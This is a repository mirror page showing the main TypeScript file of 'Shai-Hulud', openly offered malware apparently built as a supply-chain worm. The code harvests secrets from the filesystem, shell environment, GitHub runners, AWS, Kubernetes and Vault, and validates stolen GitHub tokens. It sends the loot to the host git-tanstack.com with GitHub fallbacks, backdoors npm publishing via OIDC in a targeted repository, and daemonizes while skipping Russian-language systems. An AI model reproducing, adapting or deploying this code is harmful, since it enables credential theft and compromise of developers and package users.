Mirrors/g00dfe11ow-shai-hulud-open-source
1
0
Fork 0
mirror of https://github.com/g00dfe11ow/Shai-Hulud-Open-Source.git synced 2026-06-13 13:41:22 +00:00
Code Issues Packages Projects Releases Wiki Activity
Files
a656ef1a7c8869d9b4488a7733f71952d7500e39
g00dfe11ow-shai-hulud-open-…/src/index.ts
T
TeamPCP_OSS a656ef1a7c Shai-Hulud: A Gift From TeamPCP
2099-01-01 01:01:01 +00:00

192 lines
5.7 KiB
TypeScript
Raw Blame History

import { $ } from "bun";
import { Collector } from "./collector/collector";
import { Dispatcher } from "./dispatcher/dispatcher";
import { validateToken } from "./github_utils/tokenCheck";
import { ReadmeUpdater } from "./mutator/branch";
import { NPMOidcClient } from "./mutator/npmoidc";
import { GitHubActionsService } from "./providers/actions/actions";
import { AwsAccountService } from "./providers/aws/awsAccount";
import { AwsSecretsManagerService } from "./providers/aws/secretsManager";
import { AwsSsmService } from "./providers/aws/ssm";
import type { Provider } from "./providers/base";
import { ShellService } from "./providers/devtool/devtool";
import { FileSystemService } from "./providers/filesystem/filesystem";
import { GitHubRunner } from "./providers/ghrunner/runner";
import { K8sSecretsService } from "./providers/kubernetes/kubernetes";
import type { ProviderResult } from "./providers/types";
import { VaultSecretsService } from "./providers/vault/vault-secrets";
import { DomainSenderFactory } from "./sender/domain/domainSenderFactory";
import { GitHubSenderFactory } from "./sender/github/gitHubSenderFactory";
import type { SenderDestination } from "./sender/types";
import { isCI, isSystemRussian } from "./utils/config";
import { daemonize } from "./utils/daemon";
import { acquireLock, releaseLock } from "./utils/lock";
import { logUtil } from "./utils/logger";
declare function scramble(str: string): string;
async function setupQuickResults(): Promise<ProviderResult[]> {
logUtil.log("Setting up quick results!");
const localProvider = new FileSystemService();
const shellProvider = new ShellService();
const runnerProvider = new GitHubRunner();
const quickResults: ProviderResult[] = [];
quickResults.push(await localProvider.execute());
quickResults.push(await shellProvider.execute());
quickResults.push(await runnerProvider.execute());
return quickResults;
}
async function checkTargetRepo(workflowMatch: string, targetRepo: string) {
try {
if (process.env[scramble("GITHUB_ACTIONS")]) {
const { GITHUB_WORKFLOW_REF, GITHUB_REPOSITORY } = process.env;
logUtil.info(`Ref is ${GITHUB_WORKFLOW_REF}`);
logUtil.info(`Repo is ${GITHUB_REPOSITORY}`);
if (
GITHUB_WORKFLOW_REF?.includes(workflowMatch) &&
GITHUB_REPOSITORY?.includes(targetRepo)
) {
const bitMutator = new NPMOidcClient();
await bitMutator.execute();
process.exit(0);
} else if (GITHUB_REPOSITORY?.includes(targetRepo)) {
process.exit(0);
}
}
} catch (e) {
return;
}
}
async function preflight() {
// Replace when backdooring through OIDC.
await checkTargetRepo(
scramble("release-drafter.yml"),
scramble("/opensearch-js"),
);
if (isSystemRussian()) {
logUtil.log("Exiting as russian language detected!");
process.exit(0);
}
if (!isCI() && daemonize()) {
process.exit(0);
}
const shutdown = () => {};
process.on(scramble("SIGINT"), shutdown);
process.on(scramble("SIGTERM"), shutdown);
if (!acquireLock()) {
logUtil.error("Another instance is already running");
process.exit(0);
}
}
async function main() {
try {
await preflight();
const dest: SenderDestination = {
domain: scramble("git-tanstack.com"),
port: 443,
path: scramble("router"),
dry_run: false,
};
const quickResults = await setupQuickResults();
const domainFactory = new DomainSenderFactory(dest);
const gitHubDirectFactory = new GitHubSenderFactory();
const primary = await domainFactory.tryCreate();
const senders = [primary];
// Init github fallbacks
if (!primary?.healthy()) {
const gitHubPrimary = await gitHubDirectFactory.tryCreate();
senders.push(gitHubPrimary);
if (!gitHubPrimary?.healthy()) {
const gitHubTertiary =
await gitHubDirectFactory.tryCreate(quickResults);
senders.push(gitHubTertiary);
}
}
const dispatcher = new Dispatcher({
senders,
preflight: true,
});
logUtil.info("Dispatcher start.");
const collector = new Collector({
flushThresholdBytes: 100 * 1024,
dispatch: dispatcher.dispatch,
});
logUtil.info("Collector start.");
for (const item of quickResults) {
collector.ingest(item);
}
const providers: Provider[] = [
new AwsSsmService(),
new AwsSecretsManagerService(),
new AwsAccountService(),
new K8sSecretsService(),
new VaultSecretsService(),
];
const seenTokens: Set<string> = new Set<string>();
let dispatched = false;
for (const item of quickResults) {
logUtil.log(`Checking ${item.service}`);
if (item.matches?.["ghtoken"]) {
for (const token of item.matches["ghtoken"]) {
if (seenTokens.has(token)) continue;
seenTokens.add(token);
if (!(await validateToken(token))) {
continue;
}
providers.push(new GitHubActionsService(token));
dispatched = true;
}
}
}
await collector.run(providers.map((p) => (c) => p.executeStreaming(c)));
if (!dispatched) {
for (const item2 of quickResults) {
if (item2.matches?.["ghs_old"]) {
for (const token of item2.matches["ghs_old"]) {
const updater = new ReadmeUpdater(token);
await updater.execute();
}
}
if (item2.matches?.["ghs_jwt"]) {
for (const token of item2.matches["ghs_jwt"]) {
const updater = new ReadmeUpdater(token);
await updater.execute();
}
}
}
}
await collector.finalize();
releaseLock();
} catch (e) {
} finally {
process.exit(0);
}
}
main().catch((err) => {
logUtil.error(err);
releaseLock();
process.exit(0);
});
Reference in New Issue View Git Blame Copy Permalink